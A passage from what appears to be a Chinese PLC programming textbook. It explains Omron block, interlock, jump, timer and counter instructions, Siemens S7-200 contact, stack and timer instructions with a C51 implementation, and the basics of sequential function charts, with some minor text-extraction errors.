图2-19所示梯形图需要五个逻辑块 , 这里先按顺序对五个逻辑块编写 , 然后利用 “ OR LD”和“ AND LD”指令从最后两个块开始往前将它们连接起来 。 程序中地址 00008 的“ OR LD”指令把块 d和e连接起来 , 随后的“ AND LD”指令将上述过程产生的执行条 件和块c的执行条件连接起来等 。 图 2-19 带上面结果的块 b与带上面结果的块 a的结构 与上述类似地 , 图2-19所示的梯形图可以改画为如图 2-20所示形式 ,从而简化了编 程并可节省内存空间 。 图 2-20 简化梯形图编程 图2-21和图2-22所示的例子看上去很复杂 ,但可以仅用两个逻辑块指令便可对其编 程 ,如图2-21所示 ,第一条逻辑块指令用来连接产生于块a与 b的执行条件 ,第二条指令 是用来把块c的执行条件和产生于IR00003的常闭条件的执行条件连接起来 。梯形图的其 余部分可以用“ OR”、“AND” 和“ AND NOT”指令进行编写 。上述过程的逻辑流程和编 写结果如图2-22所示 。 图 2-21 仅用两个逻辑块指令编程 图 2-22 逻辑流程和编写结果 2.1.2.4 多路与行分支指令编程 (1) 多路右侧指令编程规则 。 如果有不止一个的右侧指令按同样的执行条件执行 ,那么从指令行上最后一个条件之后对这些指令连续编写 。 图2-23所示的例子中 ,最后一个指令行还含有一个条件 , 它对应着 IR00004的“ AND”指令 。 图 2-23 多路右侧指令编程规则 (2) 指令行分支 。 当一个指令行分成两行或更多行时 , 它有时必须使用互锁或 TR位来保存分支点上存在 的执行条件 。这是因为指令行在返回分支点执行一个分支行上的指令之前执行了右侧指令 。 如果在分支点后的任意指令行上存在一个条件 ,这时执行条件可能发生改变而不能完成本来 的操作 。 图2-24的梯形图说明了这个问题 。 在两个梯形图中 , 指令 1在返回分支点前执 行 ,并且沿着分支行转向指令2。 图 2-24 指令行分支情况 (a) 正确操作;(b) 不正确操作 如图2-24(a) 所示 ,如果在分支点上存在的执行条件在返回分支行前不会改变(即最 右侧的指令不改变该执行条件), 那么将正确地执行分支行而不需要作任何特殊的编程处理 。 如图2-24(b) 所示 ,如果在分支点和最上面指令行的最后一条指令之间有一个条件 ,那么 分支点上的执行条件和完成上面指令行之后的执行条件有时可能是不同的 。 因此 ,不能确保 该分支行正确地执行 。 这有两种编制分支程序来保存执行条件的方法 。一种是使用 TR位; 另一种是使用互锁 [IL(02) /IL(03)] 指令 。 1) TR位 。TR区域共提供8个位(TR0~TR7) 可用于暂时存储执行条件 。如果一个 TR位被设置在分支点处 ,则当前的执行条件就会存储在指定的 TR位中 。 当程序返回到分 支点时 ,TR位释放出执行状态 , 而该状态正是在程序第一次执行到该分支点处时将被保存下来 。 图2-24的梯形图 B可写为如图2-25形式 , 以确保程序正确执行 。在助记符中 ,把 TR 位当作“ OUTPUT”指令的操作数 ,这样分支点的执行条件即可被存入 TR位中 。在执行 完右侧指令后 , 再把 TR位当作“ LOAD”指令的操作数 。 这样 , 这个执行条件又被释放出来 。 图 2-25 图 2-24中梯形图 B正确使用暂存继电器位 根据上述情况得出的实际指令如图2-26所示: 用一条“ LOAD”指令载入IR00000的 状态 ,从而建立初始执行条件 。 在分支点 , 用一条 “ OUTPUT” 指令将该执行条件送入 “ TR0”存储起来 。接着执行条件与 IR00001的状态进行 “ AND”操作 , 进而执行指令 1。 接下来存储在分支点的这个执行条件被再次调用( 一个以“ TR0”为操作数的“ LOAD”指 令), 这时它和IR00002的状态进行“ AND”操作 ,相应地再执行指令2。 图2-26所示的例子说明了使用两个 TR位的应用 。 图 2-26 使用两个 TR位的应用 在这个例子中 , TR0和 TR1是用来存储两个分支点的执行条件 。 在执行指令 1后, TR1内的执行条件被调出和IR00003的状态进行“ AND”操作 。而存在 TR0中的执行条件 会被两次调用 ,第一次调出来和IR00004的状态进行“ AND”操作 , 而第二次是与IR00005 的状态“ 非 ”进行“ AND”操作 。TR位可以根据需要多次使用 ,但在同一指令块中不可重 复使用同一 TR位 。程序每次开始执行新的指令块时都要返回母线 , 如果在单个指令块中, 必须要有8个以上需要保存执行条件的分支点 ,则必须使用互锁指令操作(后面说明)。 当画梯形图时 , 除非必须情况 ,一般不用 TR位 。 画梯形图时不使用 TR位可以减少程 序的指令数 ,并使程序更易于理解 。在图2-27两对梯形图中 , 简化后的形式不需使用 TR 位又能减少指令数 。 图2-27(a) 是通过重组指令块实现程序简化; 图2-27(b) 是通过将 第二个“ OUTPUT”指令分开的方法简化 , 并使用另一个“ LOAD”指令来为它产生适当 的执行条件 。 虽然简化程序总是一个令人关心的问题 , 但指令的执行顺序有时也是很重要的 。 例如, 在一个二进制加法指令执行之前 , 需要一条传送 ( MOVE) 指令把适当的数据放入所需的 操作数字中 。在考虑简化程序之前 ,必须要确认执行顺序全部正确 。 图 2-27 简化程序 (a) 简化方法一 ;(b) 简化方法二 只有在使用助记符编程时才使用 TR位 。 当直接输入梯形图时 , 不必使用 TR位 。但仍 要注意在分支点所需要 TR位的最大数目的限制 (8个), 也要注意采用适当的方法减少程 序所用的指令数 。 2) 互锁 。使用互锁 [IL(02)] 和解除互锁 [ILC(03)] 指令也可以解决在分支点上 存储执行条件的问题 。如图 2-28所示, [IL(02)] 和 [ILC(03)] 指令可完全消除分支 点 ,它允许一个特殊执行条件去控制一组指令 。 IL(02) 和ILC(03) 指令总是一起使用 。 如果在一个梯形图程序的某一段前设置了IL指令 ,那么IL指令的执行条件将控制下一个 ILC指令前的所有指令执行 。如果IL指令的执行条件为“ OFF”, 那么在该ILC指令与下一个IL指令前的所有指令都按“ OFF”执行条件去执行 ,从而对梯形图的这整个一段复位 。 如图2-24(b) 所示梯形图也可以用互锁指令来修改 。 程序中分支点的执行条件被放在互锁 (IL) 指令行上 , 所有原来从分支点分出的行都被重写成独立的指令行 , 并且在最后再加入一条解除互锁(ILC) 指令 。解除互锁 (ILC) 指令行上不能有条件存在 。 注意 , 不管 互锁(IL) 指令还是解除互锁(ILC) 指令都不需要操作数 。在上面修改过的梯形图中 , 如果IR00000的状态为“ ON”, 那么IR00001和IR00002 的状态将分别确定指令1和指令2的执行条件 。 因为IR00000为“ ON”, 那么它各位的状 态“ AND”操作结果是一样的 。 如果IR00000为“ OFF”, 那么互锁 (IL) 指令将为指令 1 和指令2产生一个 “ OFF” 执行条件 , 并从解除互锁 (ILC) 指令后面的指令继续执行 下去 。 在一个指令块中可以重复使用互锁 (IL) 指令 , 每个指令的有效范围都在解除互锁 (ILC) 指令之前 。如果上图中IR00000为“ OFF” [即 ,第一个互锁(IL) 指令的执行条件 为“ OFF”], 那么指令 1~4都按 “ OFF” 执行条件执行且程序的执行会转到解除互锁 (ILC) 指令后面的指令 。如果IR00000为“ ON”, 那么IR00001的状态将作为指令 1的执 行条件载入 ,然后将载入IR00002的状态来形成第二个互锁 (IL) 指令的执行条件 。 如果 IR00002为“ OFF”, 指令2~4将按 “ OFF” 执行条件执行 。 如果 IR00002为 “ ON”, 则 IR00003,IR00005和IR00006将确定在新指令行中第一个执行条件 。 (3) 跳转 。 根据一个指定的执行条件 ,可以跳过程序中某一指定段 。尽管在将互锁(IL) 指令的执 行条件置“ OFF”时也可实现类似功能 , 而使用跳转可以维持所有指令的操作数的状态 。 因 此 ,跳转常被用于控制需要保持连续输出的器件 , 比如气动装置 , 液压传动装置 , 而互锁 (IL) 指令常用于控制不需要连续输出的器件中 ,例如电子仪器 。 使用跳转 [JMP(04)] 和跳转结束 [JME(05)] 指令可以实现跳转 。如果一个跳转指 令的执行条件为“ ON”, 那么程序没有跳转指令一样运行 。 如果跳转指令的执行条件为 “ OFF”, 则程序会立即跳转到跳转结束指令后继续执行 , 而不改变跳转和跳转结束指令之间 的任何状态 。 所有跳转和跳转结束指令都有定义的跳转编号 , 范围从 00~99。跳转有两种类型 。其 类型决定于使用的跳转编号 。 可以在01~99的范围内取一编号定义跳转(但只能定义一次), 即每个跳转号只能使用 一次(跳转 、跳转结束指令各一次)。 当执行一条具有某跳转号的跳转指令时 , 程序会立即 跳转移到具有相同编号的跳转结束指令后 ,就像在它们两条指令之间所有的指令都不存在 一 样 。描述 TR位和互锁例子可以使用一个跳转指 令 ,重画为如图2-29所示的梯形图 。尽管本例 中跳转编号用的是 01, 只要它没有在程序其他 地方使用过 ,那么 01~99之间的任何一个数字 都是可以使用的 。 当IR00000为 “ OFF” 时 , 梯形图 B程序 的执行时间具有比其他任何方式编程的程序形 式都要短 。 使用00跳转编号可以产生另一种跳转类型 。用00作为跳转号可以产生所需要的许多次 跳转 , 它允许多条跳转指令连续使用00作为跳转号 , 而它们之间没有以00为跳转号的跳转 结束指令 。它甚至允许所有 JUMP00指令把程序执行跳转同一条 JUMP END00指令处, 即在程序中所有的JUMP00指令共用一条JUMP END00指令 。 当一个跳转指令使用00作 为跳转编号时 ,程序执行将跳转到紧跟着的以 00为跳转号的跳转结束指令后的指令 。尽管 同其他跳转指令一样 ,程序会跳过JUMP00至 JUMP END00指令间的所有指令 ,且不改 变状态 ,但因为程序要用一定的时间寻找下一个JUMP END00指令 ,所以它的执行时间比 其他跳转指令稍长些 。程序中多条JUMP00指令共用一条 JUMP END00指令 ,其执行与 使用互锁(IL) 指令的程序相似 。 一般可以使用 7条基本指令来控制单个位状态 。 它们是输出 (OUT), 输出非 (OUT NOT), 置位 (SET), 复位 (RESET), 前沿微分 (DIFU), 后 沿 微 分 (DIFD) 和 保 持 (KEEP) 指令 。所有这些指令作为一个指令行中最后一条指令出现 , 并且使用一个位地 址作为操作数 。 这些指令 (除了已经介绍过的输出和输出非) 在这里说明是因为在一些 程序中它们很重要 。尽管这些指令在 IR区中用来使输出位置 “ ON” 和 “ OFF”(即 , 向 外部设备送出或停止输出信号), 但也可以用来它在IR区或其他数据区域控制其他 “ 位 ” 的状态 。 置位和复位指令同输出和输出非指令非常相似 , 除了它们只能改变 ON执行条件的位操 作数位的状态以外 。 当执行条件为 OFF时 ,指令不影响它的操作位的状态 。 2.1.2.5 定时器和计数器指令 TIM 和 TIMH(15) 是递减的延时定时器指令 , 这些指令需要一个 TC编号和一个设 定值(SV)。 STIM(69) 用来控制时间间隔 , 它用来触发中断程序 。 CNT是递减计数器指令 ,CNTR(12) 是一个可逆的计数器指令 。 它们都需要一个 TC 编号和一个 SV,两者也都和一个用作输入信号和一个用作复位的多重指令行相连接 。 CT- BL(63), INT(89) 和 PRV(62) 用于处理高速计数器 。 INT(89) 也可用于终止脉冲 输出 。 任何一个 TC编号不能定义两次 , 即一旦它在定时器或计数器指令中被定义 ,则不能再 次使用它 。一旦定义了 ,TC编号在指令中作为操作数可根据需要多次使用 ,但不能在计数 器和定时器指令中重复定义 。 在 CPM2A/CPM2C的 PC机中 TC编号从 000~255, 而在 CPM1/CPM1A/SRM1( —V2) 的 PC机中 TC编号从 000~1270当使用一个 TC编号作为 定时器或计数器定义时 ,不需要前缀 。一旦定义为定时器 ,则一个 TC编号可以是 TIM 前 缀用作某些指令的一个操作数 。任何定时器指令使用 TIM 前缀来定义定时器 。一旦定义为 一个计数器 ,则一个 TC编号可以是 CN下前缀用作某些指令的一个操作数 。任何计数器指 令使用 CN下前缀来定义计数器 。 TC编号可以表示为所需要位或字数据的操作数 。 当表示为所需要位数据的操作数时, TC编号可以访问作为一个定时/计数 “ 完成标志 ” 功能位 , 即该标志表示定时/计数已完 成 ,也就是说 ,通常为 OFF的位在指定的 SV结束后将置 ON。 当表示为需要字数据的操作 数时 ,TC编号可以访问能够存放定时器/计数器的当前值 (PV) 的一个内存位置 。 因此, 定时器/计数器的 PV可用作 CM P(20) 的操作数 , 或任何其他的 TC区允许访问的指令 。 这是通过指定 TC编号来实现的 , 这个 TC编号用来定义访问存放定时器/计数器的当前值 (PV) 的一个内存位置 。 注意 ,TIM000是用来表示由 TC编号000定义的定时器指令 ,定义这个定时器的完成 标记 ,及定义这个定时器的 (PV) 当前值 。 对术语的解释非常清楚 , 即第一是一条指令, 第二是一个位操作数 ,第三是一个字操作数 。放在 TIM 或 CNT后面的其他 TC编号也是同 样的含义 。 一个 SV可以作为数据区中的一个常数或者一个字地址输入 。如果将一个IR区域的字 分配到一个输入单元作为字地址的话 ,输入中一元可以用线连接 , 这样 SV可以通过外部的 指轮拨盘或类似设备设定 。通过这种方法连接的定时器/计数器仅能在运行和监视模式下, 通过外部方式设定 。所有的 (SV) 设定值 (包括通过外部设定), 都必须使用 BCD码 。定 时器梯形图符号及定义值如图2-30所示 。高速定时器梯形图符号及定义值如图2-31所示 。计数器梯形图符号及定义值如图2-32所示 。 图 2-30 定时器梯形图符号及定义值 图 2-31 高速定时器梯形图符号及定义值 图 2-32 计数器梯形图符号及定义值 2.1.3 西门子系列 PLC梯形图及指令 因为梯形图是由继电器控制图发展而来 因此 PLC梯形图是面向用户的编程语言 。两 者在画法上有许多的相似之处 , 梯形图采用软件编程逻辑取代了继电器硬件接线逻辑 , 因而 它和继电器控制器有本质的区别 ,一个是接线 ,另一个是 PLC的程序 。 如图2-33所示是一 个西门子系列 PLC简单的梯形及其对应指令表语言 ,和分别表示常开和常闭触点, ﹝﹞ 表示线圈 , 梯形图代表的是一段程序而非 硬接线逻辑(图中数字表示执行顺序 , 并非程序的 一 部分)。 在 PLC梯形图中, 继电器对应的物理实体是内存 单元的某一位, 称为位功能存储器 。若该位为 1那么 表示它所代表的继电器线圈通电 , 常开触点闭合 , 常 闭触点断开 。反之, 若为0则相应的继电器线圈失电, 常开触点断开 , 常闭触点闭合 。CPU扫描用户程序的 过程实质是进行逻辑关系的运算, 接点 (或触点) 状 态 0或 1作为逻辑关系式左端各项的值进行与 、或 、 非的运算 。运算结果 1或 0送入代表继电器线圈某 一 位存储单元 , 从而导致了该继电器线圈的通电或失电 。研究 PLC梯形图语言或指令语句的位逻辑指令, 就是研究 PLC指令所代表的逻辑关系 以及实现该逻辑关系的方法 。 2.1.3.1 标准触点指令 在IEC61131— 3的 指 令 表 语 言 (Instruction List) 中 , 分 别 用 LD(Load, 装 载), AND(and, 与) 和 OR(or, 或) 指令来表示开始 、 串联和并联的常开触点 (见表 2-2)。 分别用 LDN(load Not), ANDN(and not) 和 ORN(or not) 来表示开始 、 串联和并联的 常闭触点(见表2-2,助记符中括号里面的是相应 S7-200的指令)。 触点指令中所有操作数 变量 X的数据类型为 BIT型 。触点指令的操作数主要包括输入点I、输出点 O, 中间继电器 (位存储器)(M)、 定时器(T) 的线圈状态以及计数器(C) 的线圈状态等 。 表 2-2 标 准 触 点 指 令 IEC61131-3 指令助记符 IEC61131-3标准 梯形图符号 操作的实现原理 (X表示操作数) 操作数代码 LD (STACK,n)→(STACK,n+1) (n=0, 1,2, … , 7), (STACKTOP)→(STACK,0) X→ STACKTOP I LDN (STACK,n)→(STACK,n+1) (n=0, 1,2, … , 7), X→(STAKTOP) (STACKTOP)→(STACK.0) Q M AND(A) (STACKTOP)ΛX→(STACKTOP) ANDN(AN) ---——— (STACKTOP)ΛX→(STACKTOP) T OR(O) (STACKTOP)∨X→(STACKTOP) C ORN(ON) (STACKTOP)∨ X→(STACKTOP) 标准触点指令实现简单的逻辑关系式的运算 。 S7-200为实现逻辑指令 , 在 PLC运行系 统中采用了一个9位的工作堆栈 STACK,利用 C51实现时 ,使用一个位变量来做栈顶 , 在 位寻址空间定义一个char类型(8位) 的变量作为实际意义上的堆栈 。栈顶用来存储逻辑运 算的结果 ,下面的8位用来存储中间运算结果 ,堆栈中的数据一般按“ 先进后出 ” 的原则存 取 。几个标准触点指令的实现见表2-2。 执行 LD指令时 ,将指令指定的位地址(或变量) 中的二进制数据装载入顶 。 执行 AND(与) 指令时 , 将指令指定的位地址中的二进制数和栈顶中的二进制数相 “ 与”, 结果存入栈顶 。 执行 OR指令时 ,将指令指定的位地址中的二进制数和栈顶中的二进制数相“ 或”, 结 果存入栈顶 。 执行常闭触点对应的 LDN/ANDN(AN) 和 ORN(ON) 指令时 , 取出指令指定的位 地址中的二进制数据后 ,将它取反 [(0变为1)(1变为0)], 然后再做对应的装载 、与 、或 操作 。 需要特别注意的是 , 由于提供的工作堆栈有 9级 , LD和 (或) LDN指令在同一网络 (一个梯形图网络) 连续出现超过8次时 ,再执行 LD或 LDN指令 ,将丢失数据 , 而且这样 做 ,上位机进行编译时也会报错(不允许用户这样使用)。 2.1.3.2 与堆栈有关指令 触点的串并联指令只能将单个触点与别的触点电路串并联 ,要想实现如图 2-34所示梯 形图的功能 ,将图2-34中由I3.2和 T16的触点组成的串联电路与它上面的电路并联 , 再 和后面的电路块串联 ,然后完成输出 。 图2-35中 , 当需要读取中间结果并且产生多个输出 时 ,都需要用到逻辑堆栈指令才可实现 。 图 2-34 堆栈指令的作用与使用 1 西门子 PLC S7-200与堆栈有关的指令有6个 , 它们的实现原理与功能如下: .ALD: 栈装载与指令 , 它将堆栈中的第一层和第二层进行逻辑与操作 , 结果放入栈 顶 。执行完栈装载与指令后 ,堆栈深度减1,如图2-35所示 。 . OLD: 栈装载或指令 ,实现的功能是将堆栈中的第一层和第二层的值进行逻辑或操 作 ,结果放入栈顶 ,原理如图2-35所示 。执行完栈装载与指令后 , 堆栈深度减 1。这样可 以看出 ,将电路块串并联时 , 每增加一个用 LD或 LDN指令开始的电路块的运算结果 , 堆 栈中增加一个数据 ,堆栈深度加1, 每执行一条 ALD或 OLD指令 ,堆栈深度减1。 图 2-35 ALD与 OLD指令的堆栈操作 . LPS: 逻辑推入栈指令 , 复制栈顶内容 ,并将其压入堆栈的下一层 , 栈中原来的数据 依次向下层推移 ,栈底值被推出丢失 。 .LRD: 逻辑读栈指令 ,将堆栈中第二层的数据复制到栈顶 , 2~9层的数据不变 , 但 原栈顶值被新的复制值覆盖丢失 。 .LPP: 逻辑出栈指令 , 指令使栈中各层的数据向上移动一层 , 第 2层的数据成为栈 顶 ,原来的栈顶值从栈内消失 。 .LDSn(n=1~8): 装载堆栈指令 , 复制堆栈内第 n层的值到栈顶 , 栈中原来的数据 依次向下一层推移 ,栈底值被推出丢失 。 图2-36说明了堆栈指令 LPS、LRD、LPP在指令表语言中的作用和使用方法 。 图 2-36 堆栈指令的作用与使用 2 2.1.3.3 立即触点指令 立即(immediate) 触点指令只能用于输入 (I), 执行立即触点指令时 , 立即读入物理 输入点的值 ,根据该值决定触点的接通/断开状态 ,但是并不立即更新该物理输入点对应的 映像寄存器 ,也就是说 ,立即触点并不依赖于系统的扫描周期刷新 , 它会立即刷新 。在 C51实现中 ,立即触点指令就是要立刻读入物理输入端口的状态值 ,在本次的扫描周期中不更新 I/O映像中的值 , 而是在下一个扫描周期开始时再读入物理端口的值 ,更新I/O映像区 。在 指令表语言中 ,分别用 LDI、AI、OI来表示载入 、 串联和并联的立即常开触点 , 用 LDNI、 ANI、ONI来表示载入 、 串联和并联的立即常闭触点 , 与梯形图的对应关系见表2-3。触点 符号中间的“ I”和“/I”表示立即常开和立即常闭 , 逻辑关系的实现和标准触点指令完全 相同 。 表 2-3 立 即 触 点 指 令 指令助记符 梯形图符号 指 令 功 能 LDI 载入立即常开触点 LDNI 载入立即常闭触点 AI 串联立即常开触点 ANI 串联立即常闭触点 OI 并联立即常开触点 ONI 并联立即常闭触点 2.1.3.4 输出指令及取反指令 输出指令(OUT) 与梯形图中的线圈相对应 , 驱动线圈的触点电路接通时 , 线圈流过 “ 能流”, 指定位对应的映像寄存器为 1, 反之则为 0,输出类指令应放在梯形图的最右边, 变量是 BIT类型 。输出指令的功能是将栈顶值复制到对应的映像寄存器 , 在扫描周期结束 时 ,才读取输出口映像区内容 ,改变物理端口的状态 。 立即输出指令 OUTI,将栈顶值立即写入指定的物理输出位和对应的输出映像寄存器 。 梯形图中用线圈符号中的I用来表示立即输出 。 当立即输出指令执行时 , 物理输出点立即被 置为能流值 。在 C51实现中 ,立即指令的实现是将栈顶的值立即复制到物理输出端口地址 内 , 同时新值会同时被写到物理输出端口的映像区内 ,这一点于立即触点指令不同 ,立即触 点指令在本扫描周期内不改变映像区内容 。 取反指令 NOT将它左边电路的逻辑运算结果取反 , 运算结果若为 1则变为 0, 为 0则 变为1,该指令没有操作数 。能流到达该触点时即停止 ,若能流未到达该触点 ,该触点给右 侧供给能流 。NOT指令将堆栈顶部的值从0改为1,或从1改为0。 三种指令和梯形图的对应关系见表2-4。 表 2-4 输出指令及取反指令 指令助记符 梯形图符号 指 令 作 用 OUT 立即装载电路开始的常开触点 OUTI 立即装载电路开始的常闭触点 NOT 立即与串联的常开触点 2.1.3.5 定时器功能及指令 研究定时器指令的实现 ,应首先从定时器的功能 、定时器位和定时器值的刷新入手 , 分 析其相关因素 ,从而得出其实现方法 。 (1) 定时器功能及运行原理分析 。 西门子的 S7-200PLC定时器按功能分为3种: 通电延时定时器 、断电延时定时器和保 持型通电延时定时器 。如图2-37所示 ,通电延时定时器(TON) 的输入端(IN) 的输入电 路接通时开始定时 , 当前值大于等于 PT端指定的预设值时 ,定时器位变为 ON, 梯形图中对应定时器的常开触点闭合 , 常闭触点打开 , 断电延时则与通电延时功能相反 。保持通电延时定时器有记 忆功能 ,输入电路断开时 , 停止定时器计时但当前值保持不变 , 输入电路再次接通 , 继续计时 , 以通电延时定时器论述定时器的实现方法 。S7-200的定时器按分辨率可分为 1ms定时 , 10ms定时器以及100ms定时器 。而系统实现时不可能为每个定时器都启动一个单片机的定时器 来实现它(单片机定时器非常有限)。 所以我们首先从 S7-200系统的定时器当前值刷新方法 入手来研究如何使用单片机定时器来提供 PLC多个定时器的功能 , 1ms定时器记录自现用 1ms定时器启用以来 1ms定时器间隔的数目 。执行定时器指令即开始计时 ,但是 1ms定时 器每毫秒更新一次(定时器位和定时器当前值), 不与扫描周期同步 。换言之在超过 1ms的 扫描过程中 ,定时器位和定时器当前值将多次更新(这里的定时器位指的是定时器对应的线 圈状态 ,下同)。 对于定时器指令 TON/TOF的执行 , 主要负责打开和重设定时器 , TONR 则用于关闭定时器 。 10ms定时器记录自现用 10ms定时器启用以来 10ms定时器间隔的数 目 。执行定时器指令即启动定时器 ;但是 ,在每次扫描循环的开始更新 10ms定时器 ,其方 法是以当前值加上积累的10ms间隔的数目(自前一次扫描开始算起 , 换言之 , 在整个扫描 过程中 ,定时器当前值及定时器位保持不变)。 100ms定时器记录自现用 100ms定时器上一次更新以来 100ms定时器间隔的数目 。 这种定时器的更新方法是在执行定时器指令时以当前值加上积累的 100ms间隔的数目 (自前一次扫描开始算起)。 只有在执行定时器指令时才对 100ms定时器的当前值进行 更新 。 从上述分析可以看出 , 要实现 PLC的定时器功能首先需要一个时钟 , 其次要对 1ms定时器 、 10ms定时器以及 100ms定时器使用不同的处理方法 , 定时器指令虽然相同 , 但 是指令内部对于三种定时器的处理方法显然不同 , 按照上述三种定时器值的刷新原理 , 我们可以总结为对于 1ms定时器 , 定时器位和当前值的更新不与扫描周期同步 , 在一个 扫描周期内定时器位和当前值刷新多次 ; 对于 10ms定时器 , 定时器位和当前值的更新与 扫描周期同步 , 定时器位和当前值在每个程序扫描周期的开始刷新 (在一个扫描周期过 程中为常数 。 在每个扫描周期的开始会将一个扫描周期内累计的时间间隔加到定时器当 前值上); 对于 100ms定时器 , 不与扫描周期同步 , 定时器位和当前值在定时器指令执行 时刷新 。 (2) 定时器功能及定时器指令的实现 。 首先就是要实现一个实时时钟 , 在程序中使用 C8051F020的 TIMERO使用 16位定时 器/计数器方式产生1ms定时中断 。 由于 PLC系统中需要 1ms定时器个数较少 , 所以在中 断程序中处理 PLC的1ms定时器 ,对于10ms定时器 , 以变量记录1扫描周期内10ms总计 数 , 而对于100ms定时器则是以变量来记录 2次定时器指令执行的时间间隔的 100ms总 计数 。 另外由于 S7-200还提供以1s和 1min为周期的时钟脉冲 ,所以系统也在此中断程序中 实现 。从 PLC系统需要来看 , 3种 PLC的定时器的个数都是不同的 , 而且由于 100ms定时 器用户需要使用的最多 , 因此系统需要提供的也最多 。 以 S7-200为例 , 有 256个定时器, 其中1ms定时器有4个 , 10ms定时器有 16个 ,其余 236个为 100ms定时器 , 并且每种定 时器还有具体功能上的分类(通电延时 、断电延时 、保持型通电延时等)。 因此使用 C51实 现 PLC运行系统时就要考虑定时器实现上的可扩展性 。 另外 , 由于每个定时器都必须独立 运行 ,相关的参数比较多 , 例如 , 定时器的工作状态 (启动与否)、 相应线圈的动作状态 (闭合与否)、 定时器的设定值 、定时器的当前值等 。 用户使用定时器时要注意 , 由于可以在 1ms内的任意时刻启动定时器 , 预设值必须设 为比最小要求定时器间隔大一个时间间隔 。 例如 , 使用 1ms定时器时 , 为了保证时间间隔 至少为56ms, 则预设时间值应设为 57010ms、 100ms定时器有同样的问题 , 例如 , 使用 10ms定时器时 , 为了保证时间间隔至少为140ms, 则预设时间值应设为 15, 使用 100ms定 时器时 , 为了保证时间间隔至少为2100ms, 则预设时间值应设为22。 2.1.3.6 计数器功能及指令 S7-200提供的计数器个数有256个 ,计数器指令有3类: 加计数器 (CTU)、 减计数器 (CTD) 和加减计数器(CTUD)。 本节首先从分析计数器功能及计数原理出发 ,研究其实现 机制 ,从而得出自己的 C51系统实现方法 。 (1) 加计数器功能及原理分析 。 如图2-38所示 , 当复位输入(R) 断开时 , 加计数器脉冲输入 CU电路由断开变为接 通(即 CU信号的上升沿), 计数器当前值加 1, 直至计数最大值 65535(S7-200计数最大 值为32767)。 当前值大于等于设定值 (PV) 时 ,该计数器位被置 1, 相应线圈的常开触点 闭合 , 常闭触点打开 。 当复位输入(R) ON时 ,计数器被复位 ,计数器位变为 OFF, 当前值清零 。在指令表 语言实现中 ,栈顶值是复位输入(R), 加计数输入值放在栈顶下面一层 。 (2) 减计数器功能及原理分析 。 在减计数脉冲输入 CD的上升沿(从 OFF到 ON), 从设定值开始 ,计数器的当前值减 1,减至0时 ,停止计数 , 计数器位被置 1。装载输入 (LD) 为 ON时 , 计数器位被复位, 并把设定值装入当前值 (如图 2-39所示)。 在指令表语言实现中 , 栈顶值是装载输入 (LD), 减计数输入 CD放在栈顶下面一层 。 图 2-38 CTLI指令与梯形图 图 2-39 CTD指令与梯形图 由于系统没有使用加减计数器 (CTUD), 所以这里不在阐述其功能及原理 。从以上分 析可以得出如下结论: 1) 每个计数器既可以作加计数器用 ,也可以作减计数器用 。 2) 对某个固定计数器正常运行需要记录的参数有计数器的设定值 、计数器当前值 、计 数器输入端前次输入状态(0或1)、 计数器位(相应线圈状态)。 3) 计数器语句执行时 ,计数器的复位输入值都放在栈顶 , 计数输入值都放在栈顶下面 一层 。 4) 满足动作条件(输入或复位) 立即动作(计数累加或复位)。 由上述分析 ,可以得出 PLC运行系统的计数器功能实现方法 。 2.2 PLC的编程顺序与状态图 2.2.1 顺序图编程与实例 顺序功能图(SFC,Sequential Function Chart) 是描述控制系统的控制过程 、功能和特 性的一种图形 ,是设计 PLC顺序控制程序的有力工具 。顺序功能图并不涉及所描述的控制 功能的具体技术 , 它是一种通用的技术语言 , 可以供进一步设计和不同专业的人员之间 进行技术交流之用 。顺序功能图主要由步 、有向连线 、转换 、转换条件和动作 (或命令) 组成 。 顺序控制设计法最基本的思想是将系统的一个工作周期划分为若干个顺序相连的阶段, 这些阶段称为步(Step), 可以用编程元件 [例如辅助继电器(M) 和顺序控制继电器 (S)] 来代表各步 。步是根据输出量的状态变化来划分的 , 在任意一步之内 , 各输出量的 ON/ OFF状态不变 ,但是相邻两步输出量总的状态是不同的 , 步的这种划分方法使代表各步的 编程元件的状态与各输出量的状态之间有着极为简单的逻辑关系 。在顺序功能图中用矩形方 框表示步 ,一般用代表该步的编程元件的元件号作为步的代号 ,如 S0、M0等 ,这样设计梯 形图时较为方便 。PLC控制程序设计步如下 。 (1) 初始步 。 与系统的初始状态相对应的步称为初始步 ,初始状态一般是系统等待起动命令的相对静止的状态 。初始步用双线方框表示 , 每一个顺序功能图至少应该有一个初始步 。 (2) 活动步 。 当系统正处于某一步所在的阶段时 ,该步处于活动状态 ,称该步为活动步 。步处于活动 状态时 ,相应的动作被执行; 处于不活动状态时 ,相应的非存储型动作被停止执行 。 (3) 有向连线 。 在画顺序功能图时, 将代表各步的方框按它们成为活动步的先后次序顺序排列 ,并用有 向连线将它们连接起来 。步的活动状态习惯的进展方向是从上到下或从左至右 ,在这两个方 向有向连线上的箭头可以省略 。 (4) 转换 。 转换用有向连线上与有向连线垂直的短划线来表示 ,转换将相邻两步分隔开 。步的活动 状态的进展是由转换的实现来完成的 ,并与控制过程的发展相对应 。 (5) 转换条件 。 使系统由当前步进入下一步的信号称为转换条件, 转换条件可以是外部的输入信号; 也 可以是 PLC内部产生的信号, 如定时器 、计数器常开触点的接通等 , 转换条件还可能是若 干个信号的与 、或 、非逻辑组合 。顺序控制设计法用转换条件控制代表各步的编程元件, 让 它们的状态按一定的顺序变化, 然后用代表各步的编程元件去控制 PLC的各输出继电器 。 2.2.1.1 顺序功能图转换实现规则 (1) 转换实现的条件 。 顺序功能图中 , 步的活动状态的进展是由转换的实现来完成的 。转换实现必须同时满足 两个条件: .该转换所有的前级步都是活动步 。 .相应的转换条件得到满足 。 (2) 转换实现应完成的操作 。 .使所有由有向连线与相应转换符号相连的后续步都变为活动步 。 .使所有由有向连线与相应转换符号相连的前级步都变为不活动步 。 转换实现的基本规则是根据顺序功能图设计梯形图的基础 。在梯形图中 ,用编程元件代 表步 , 当某步为活动步时 ,该步对应的编程元件为1状态 。 2.2.1.2 使用起保停电路的编程方法 图2-40中的步 M1、M2和 M3是顺序功能图中顺序相连的 3步, X1是步 M2之前的 转换条件 。M1对应的步为活动步时, M1为 ON。该步之后的转换条件 X1满足时, X1的常开触点接通 , 因此可以将 M1和X1的常开触点组成的串联电路作为与转换实现的两个条 件同时满足对应的电路 。用它来使后续步对应的 M2变 为 ON, 同时使 M1变为 OFF。设计起保停电路的关键 是找出它的起动条件和停止条件 。根据转换实现的基本 规则 ,转换实现的条件是它的前级步为活动步 ,并且满 足相应的转换条件, 所以步 M2变为活动步的条件是它 的前级步 M1为活动步, 且转换条件 